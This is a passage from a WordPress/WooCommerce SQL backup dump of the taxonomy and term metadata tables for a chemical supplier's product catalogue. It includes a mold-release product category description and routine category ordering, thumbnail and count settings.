INSERT INTO `wp_term_taxonomy` VALUES (529, 529, 'product_cat', 'Miller-Stephenson specialty mold release agents have been meticulously refined for specific mold operations such as <strong>Pre-cast concrete release</strong>, <strong>Glass-fiber reinforced concrete (GFRC)</strong>,<strong> Rotational molding (ROTO-Molding)</strong>, and <strong>Ultra-High Temperature composites and plastics</strong>. Miller-Stephenson proprietary chemistries provide unmatched performance, cost-effectiveness, and throughput. These specialty mold release products are meticulous designed for optimal performance while minimizing worker exposure and meeting strict environmental regulations. ReleaSys specialty mold release solution feature easy-to-apply, ultra-low or no VOC formulations and eco-friendly water-based formulations.', 8, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (530, 530, 'product_tag', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (531, 531, 'product_tag', '', 0, 1);
#
# End of data contents of table `wp_term_taxonomy`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_termmeta`


#
# Delete any existing table `wp_termmeta`
#

DROP TABLE IF EXISTS `wp_termmeta`;


#
# Table structure of table `wp_termmeta`
#

CREATE TABLE `wp_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=993 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_termmeta`
#
 
INSERT INTO `wp_termmeta` VALUES (1, 8, 'order', '75'); 
INSERT INTO `wp_termmeta` VALUES (2, 8, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (3, 8, 'thumbnail_id', '1921'); 
INSERT INTO `wp_termmeta` VALUES (4, 9, 'order', '2'); 
INSERT INTO `wp_termmeta` VALUES (5, 9, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (6, 9, 'thumbnail_id', '1140'); 
INSERT INTO `wp_termmeta` VALUES (7, 10, 'order', '79'); 
INSERT INTO `wp_termmeta` VALUES (8, 10, 'display_type', ''); 
INSERT INTO `wp_termmeta` VALUES (9, 10, 'thumbnail_id', '1922'); 
INSERT INTO `wp_termmeta` VALUES (10, 11, 'order', '68'); 
INSERT INTO `wp_termmeta` VALUES (11, 11, 'display_type', ''); 
INSERT INTO `wp_termmeta` VALUES (12, 11, 'thumbnail_id', '1916'); 
INSERT INTO `wp_termmeta` VALUES (13, 12, 'order', '74'); 
INSERT INTO `wp_termmeta` VALUES (14, 12, 'display_type', ''); 
INSERT INTO `wp_termmeta` VALUES (15, 12, 'thumbnail_id', '1919'); 
INSERT INTO `wp_termmeta` VALUES (16, 13, 'order', '86'); 
INSERT INTO `wp_termmeta` VALUES (17, 13, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (18, 13, 'thumbnail_id', '1923'); 
INSERT INTO `wp_termmeta` VALUES (19, 12, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1244";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (20, 11, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1232";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (21, 16, 'order', '77'); 
INSERT INTO `wp_termmeta` VALUES (22, 16, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (23, 16, 'thumbnail_id', '1078'); 
INSERT INTO `wp_termmeta` VALUES (24, 16, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1208";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (25, 8, 'product_count_product_cat', '26'); 
INSERT INTO `wp_termmeta` VALUES (26, 16, 'product_count_product_cat', '10'); 
INSERT INTO `wp_termmeta` VALUES (27, 17, 'product_count_product_tag', '10'); 
INSERT INTO `wp_termmeta` VALUES (28, 18, 'product_count_product_tag', '0'); 
INSERT INTO `wp_termmeta` VALUES (29, 19, 'product_count_product_tag', '0'); 
INSERT INTO `wp_termmeta` VALUES (30, 11, 'product_count_product_cat', '13'); 
INSERT INTO `wp_termmeta` VALUES (31, 9, 'product_count_product_cat', '111'); 
INSERT INTO `wp_termmeta` VALUES (32, 12, 'product_count_product_cat', '5'); 
INSERT INTO `wp_termmeta` VALUES (33, 10, 'product_count_product_cat', '28'); 
INSERT INTO `wp_termmeta` VALUES (34, 13, 'product_count_product_cat', '4'); 
INSERT INTO `wp_termmeta` VALUES (35, 20, 'order', '78'); 
INSERT INTO `wp_termmeta` VALUES (36, 20, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (37, 20, 'thumbnail_id', '1931'); 
INSERT INTO `wp_termmeta` VALUES (38, 21, 'order', '76'); 
INSERT INTO `wp_termmeta` VALUES (39, 21, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (40, 21, 'thumbnail_id', '1927'); 
INSERT INTO `wp_termmeta` VALUES (41, 21, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1200";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (58, 27, 'order', '72'); 
INSERT INTO `wp_termmeta` VALUES (59, 27, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (60, 27, 'thumbnail_id', '1942'); 
INSERT INTO `wp_termmeta` VALUES (61, 27, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1232";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (62, 28, 'order', '71'); 
INSERT INTO `wp_termmeta` VALUES (63, 28, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (64, 28, 'thumbnail_id', '1941'); 
INSERT INTO `wp_termmeta` VALUES (65, 29, 'order', '69'); 
INSERT INTO `wp_termmeta` VALUES (66, 29, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (67, 29, 'thumbnail_id', '1940'); 
INSERT INTO `wp_termmeta` VALUES (68, 30, 'order', '70'); 
INSERT INTO `wp_termmeta` VALUES (69, 30, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (70, 30, 'thumbnail_id', '1944'); 
INSERT INTO `wp_termmeta` VALUES (71, 31, 'order', '73'); 
INSERT INTO `wp_termmeta` VALUES (72, 31, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (73, 31, 'thumbnail_id', '1946'); 
INSERT INTO `wp_termmeta` VALUES (74, 27, 'product_count_product_cat', '4'); 
INSERT INTO `wp_termmeta` VALUES (75, 8, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (76, 29, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1232";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (77, 31, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1232";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (86, 34, 'order', '3'); 
INSERT INTO `wp_termmeta` VALUES (87, 34, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (88, 34, 'thumbnail_id', '1937'); 
INSERT INTO `wp_termmeta` VALUES (89, 35, 'order', '10'); 
INSERT INTO `wp_termmeta` VALUES (90, 35, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (91, 35, 'thumbnail_id', '1936'); 
INSERT INTO `wp_termmeta` VALUES (92, 36, 'order', '25'); 
INSERT INTO `wp_termmeta` VALUES (93, 36, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (94, 36, 'thumbnail_id', '1939'); 
INSERT INTO `wp_termmeta` VALUES (95, 37, 'order', '23'); 
INSERT INTO `wp_termmeta` VALUES (96, 37, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (97, 37, 'thumbnail_id', '1945'); 
INSERT INTO `wp_termmeta` VALUES (98, 36, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (99, 38, 'order', '24'); 
INSERT INTO `wp_termmeta` VALUES (100, 38, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (101, 38, 'thumbnail_id', '1943'); 
INSERT INTO `wp_termmeta` VALUES (102, 38, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (103, 39, 'order', '29'); 
INSERT INTO `wp_termmeta` VALUES (104, 39, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (105, 39, 'thumbnail_id', '991'); 
INSERT INTO `wp_termmeta` VALUES (106, 37, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (107, 40, 'order', '17'); 
INSERT INTO `wp_termmeta` VALUES (108, 40, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (109, 40, 'thumbnail_id', '1938'); 
INSERT INTO `wp_termmeta` VALUES (110, 35, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (111, 40, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (112, 39, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (113, 34, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (114, 34, 'product_count_product_cat', '33'); 
INSERT INTO `wp_termmeta` VALUES (115, 9, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (116, 43, 'order_pa_sizes-available', '0'); 
INSERT INTO `wp_termmeta` VALUES (117, 44, 'order_pa_sizes-available', '0'); 
INSERT INTO `wp_termmeta` VALUES (118, 45, 'order', '8'); 
INSERT INTO `wp_termmeta` VALUES (119, 45, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (120, 45, 'thumbnail_id', '2357'); 
INSERT INTO `wp_termmeta` VALUES (121, 46, 'order', '4'); 
INSERT INTO `wp_termmeta` VALUES (122, 46, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (123, 46, 'thumbnail_id', '239'); 
INSERT INTO `wp_termmeta` VALUES (200, 20, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1210";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (201, 21, 'product_count_product_cat', '11'); 
INSERT INTO `wp_termmeta` VALUES (202, 46, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (203, 45, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (235, 79, 'order', '15'); 
INSERT INTO `wp_termmeta` VALUES (236, 79, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (237, 79, 'thumbnail_id', '241'); 
INSERT INTO `wp_termmeta` VALUES (262, 86, 'order', '11'); 
INSERT INTO `wp_termmeta` VALUES (263, 86, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (264, 86, 'thumbnail_id', '247'); 
INSERT INTO `wp_termmeta` VALUES (265, 86, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (266, 79, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (284, 20, 'product_count_product_cat', '3'); 
INSERT INTO `wp_termmeta` VALUES (285, 45, 'product_count_product_cat', '8'); 
INSERT INTO `wp_termmeta` VALUES (286, 46, 'product_count_product_cat', '23'); 
INSERT INTO `wp_termmeta` VALUES (293, 13, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:3:"867";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (294, 93, 'order', '41'); 
INSERT INTO `wp_termmeta` VALUES (295, 93, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (296, 93, 'thumbnail_id', '1905'); 
INSERT INTO `wp_termmeta` VALUES (297, 94, 'order', '67'); 
INSERT INTO `wp_termmeta` VALUES (298, 94, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (299, 94, 'thumbnail_id', '1891'); 
INSERT INTO `wp_termmeta` VALUES (300, 94, 'product_count_product_cat', '10'); 
INSERT INTO `wp_termmeta` VALUES (301, 93, 'product_count_product_cat', '61'); 
INSERT INTO `wp_termmeta` VALUES (302, 93, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (303, 28, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1232";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (304, 30, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1232";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (305, 28, 'product_count_product_cat', '2'); 
INSERT INTO `wp_termmeta` VALUES (306, 29, 'product_count_product_cat', '4'); 
INSERT INTO `wp_termmeta` VALUES (307, 30, 'product_count_product_cat', '1'); 
INSERT INTO `wp_termmeta` VALUES (308, 31, 'product_count_product_cat', '1'); 
INSERT INTO `wp_termmeta` VALUES (309, 95, 'order', '45'); 
INSERT INTO `wp_termmeta` VALUES (310, 95, 'display_type', ''); 
INSERT INTO `wp_termmeta` VALUES (311, 95, 'thumbnail_id', '1950'); 
INSERT INTO `wp_termmeta` VALUES (312, 95, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (313, 79, 'product_count_product_cat', '6'); 
INSERT INTO `wp_termmeta` VALUES (314, 35, 'product_count_product_cat', '23'); 
INSERT INTO `wp_termmeta` VALUES (315, 96, 'order', '5'); 
INSERT INTO `wp_termmeta` VALUES (316, 96, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (317, 96, 'thumbnail_id', '680'); 
INSERT INTO `wp_termmeta` VALUES (318, 97, 'order', '6'); 
INSERT INTO `wp_termmeta` VALUES (319, 97, 'display_type', ''); 
INSERT INTO `wp_termmeta` VALUES (320, 97, 'thumbnail_id', '254'); 
INSERT INTO `wp_termmeta` VALUES (321, 98, 'order', '7'); 
INSERT INTO `wp_termmeta` VALUES (322, 98, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (323, 98, 'thumbnail_id', '701'); 
INSERT INTO `wp_termmeta` VALUES (324, 96, 'product_count_product_cat', '8'); 
INSERT INTO `wp_termmeta` VALUES (325, 97, 'product_count_product_cat', '7'); 
INSERT INTO `wp_termmeta` VALUES (326, 98, 'product_count_product_cat', '8'); 
INSERT INTO `wp_termmeta` VALUES (327, 96, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (328, 97, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (329, 98, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (330, 86, 'product_count_product_cat', '15'); 
INSERT INTO `wp_termmeta` VALUES (331, 99, 'order', '12'); 
INSERT INTO `wp_termmeta` VALUES (332, 99, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (333, 99, 'thumbnail_id', '243'); 
INSERT INTO `wp_termmeta` VALUES (334, 100, 'order', '13'); 
INSERT INTO `wp_termmeta` VALUES (335, 100, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (336, 100, 'thumbnail_id', '685'); 
INSERT INTO `wp_termmeta` VALUES (337, 101, 'order', '14'); 
INSERT INTO `wp_termmeta` VALUES (338, 101, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (339, 101, 'thumbnail_id', '691'); 
INSERT INTO `wp_termmeta` VALUES (340, 99, 'product_count_product_cat', '5'); 
INSERT INTO `wp_termmeta` VALUES (341, 102, 'product_count_product_tag', '104'); 
INSERT INTO `wp_termmeta` VALUES (342, 100, 'product_count_product_cat', '3'); 
INSERT INTO `wp_termmeta` VALUES (343, 103, 'product_count_product_tag', '22'); 
INSERT INTO `wp_termmeta` VALUES (344, 104, 'product_count_product_tag', '22'); 
INSERT INTO `wp_termmeta` VALUES (345, 105, 'product_count_product_tag', '84'); 
INSERT INTO `wp_termmeta` VALUES (346, 106, 'product_count_product_tag', '33'); 
INSERT INTO `wp_termmeta` VALUES (347, 107, 'product_count_product_tag', '0'); 
INSERT INTO `wp_termmeta` VALUES (348, 108, 'product_count_product_tag', '39'); 
INSERT INTO `wp_termmeta` VALUES (349, 109, 'product_count_product_tag', '33'); 
INSERT INTO `wp_termmeta` VALUES (350, 110, 'product_count_product_tag', '22'); 
INSERT INTO `wp_termmeta` VALUES (351, 111, 'product_count_product_tag', '10'); 
INSERT INTO `wp_termmeta` VALUES (352, 112, 'product_count_product_tag', '15'); 
INSERT INTO `wp_termmeta` VALUES (353, 113, 'product_count_product_tag', '7'); 
INSERT INTO `wp_termmeta` VALUES (354, 101, 'product_count_product_cat', '7'); 
INSERT INTO `wp_termmeta` VALUES (355, 114, 'product_count_product_tag', '4'); 
INSERT INTO `wp_termmeta` VALUES (356, 115, 'order', '18'); 
INSERT INTO `wp_termmeta` VALUES (357, 115, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (358, 115, 'thumbnail_id', '260'); 
INSERT INTO `wp_termmeta` VALUES (359, 116, 'order', '22'); 
INSERT INTO `wp_termmeta` VALUES (360, 116, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (361, 116, 'thumbnail_id', '711'); 
INSERT INTO `wp_termmeta` VALUES (362, 115, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (363, 115, 'product_count_product_cat', '7'); 
INSERT INTO `wp_termmeta` VALUES (364, 40, 'product_count_product_cat', '9'); 
INSERT INTO `wp_termmeta` VALUES (365, 118, 'product_count_product_tag', '8'); 
INSERT INTO `wp_termmeta` VALUES (366, 119, 'product_count_product_tag', '9'); 
INSERT INTO `wp_termmeta` VALUES (367, 120, 'product_count_product_tag', '3'); 
INSERT INTO `wp_termmeta` VALUES (368, 121, 'product_count_product_tag', '3'); 
INSERT INTO `wp_termmeta` VALUES (369, 122, 'order', '19'); 
INSERT INTO `wp_termmeta` VALUES (370, 122, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (371, 122, 'thumbnail_id', '689'); 
INSERT INTO `wp_termmeta` VALUES (372, 123, 'order', '20'); 
INSERT INTO `wp_termmeta` VALUES (373, 123, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (374, 123, 'thumbnail_id', '688'); 
INSERT INTO `wp_termmeta` VALUES (375, 124, 'order', '21'); 
INSERT INTO `wp_termmeta` VALUES (376, 124, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (377, 124, 'thumbnail_id', '687'); 
INSERT INTO `wp_termmeta` VALUES (378, 122, 'product_count_product_cat', '2'); 
INSERT INTO `wp_termmeta` VALUES (379, 124, 'product_count_product_cat', '2'); 
INSERT INTO `wp_termmeta` VALUES (380, 123, 'product_count_product_cat', '3'); 
INSERT INTO `wp_termmeta` VALUES (381, 100, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (382, 101, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (383, 122, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (384, 123, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (385, 124, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (386, 116, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (387, 116, 'product_count_product_cat', '2'); 
INSERT INTO `wp_termmeta` VALUES (388, 37, 'product_count_product_cat', '4'); 
INSERT INTO `wp_termmeta` VALUES (389, 125, 'product_count_product_tag', '4'); 
INSERT INTO `wp_termmeta` VALUES (390, 126, 'product_count_product_tag', '4'); 
INSERT INTO `wp_termmeta` VALUES (391, 99, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (392, 127, 'order', '55'); 
INSERT INTO `wp_termmeta` VALUES (393, 127, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (394, 127, 'thumbnail_id', '1952'); 
INSERT INTO `wp_termmeta` VALUES (395, 128, 'order', '44'); 
INSERT INTO `wp_termmeta` VALUES (396, 128, 'display_type', 'products'); 
INSERT INTO `wp_termmeta` VALUES (397, 128, 'thumbnail_id', '1949'); 
INSERT INTO `wp_termmeta` VALUES (398, 128, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (399, 129, 'order', '61'); 
INSERT INTO `wp_termmeta` VALUES (400, 129, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (401, 129, 'thumbnail_id', '1951'); 
INSERT INTO `wp_termmeta` VALUES (402, 95, 'product_count_product_cat', '24'); 
INSERT INTO `wp_termmeta` VALUES (404, 38, 'product_count_product_cat', '4'); 
INSERT INTO `wp_termmeta` VALUES (405, 130, 'order', '26'); 
INSERT INTO `wp_termmeta` VALUES (406, 130, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (407, 130, 'thumbnail_id', '873'); 
INSERT INTO `wp_termmeta` VALUES (408, 131, 'order', '27'); 
INSERT INTO `wp_termmeta` VALUES (409, 131, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (410, 131, 'thumbnail_id', '892'); 
INSERT INTO `wp_termmeta` VALUES (411, 130, 'product_count_product_cat', '4'); 
INSERT INTO `wp_termmeta` VALUES (412, 36, 'product_count_product_cat', '5'); 
INSERT INTO `wp_termmeta` VALUES (413, 132, 'product_count_product_tag', '6'); 
INSERT INTO `wp_termmeta` VALUES (414, 133, 'product_count_product_tag', '4'); 
INSERT INTO `wp_termmeta` VALUES (415, 134, 'product_count_product_tag', '4'); 
INSERT INTO `wp_termmeta` VALUES (416, 135, 'product_count_product_tag', '4'); 
INSERT INTO `wp_termmeta` VALUES (418, 130, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (419, 136, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (420, 137, 'order', '54'); 
INSERT INTO `wp_termmeta` VALUES (421, 137, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (422, 137, 'thumbnail_id', '1964'); 
INSERT INTO `wp_termmeta` VALUES (423, 137, 'product_count_product_cat', '6'); 
INSERT INTO `wp_termmeta` VALUES (424, 138, 'order', '53'); 
INSERT INTO `wp_termmeta` VALUES (425, 138, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (426, 138, 'thumbnail_id', '1961'); 
INSERT INTO `wp_termmeta` VALUES (427, 131, 'product_count_product_cat', '1'); 
INSERT INTO `wp_termmeta` VALUES (428, 139, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (429, 140, 'product_count_product_tag', '6'); 
INSERT INTO `wp_termmeta` VALUES (430, 141, 'product_count_product_tag', '4'); 
INSERT INTO `wp_termmeta` VALUES (431, 131, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (432, 138, 'product_count_product_cat', '3'); 
INSERT INTO `wp_termmeta` VALUES (433, 142, 'order', '51'); 
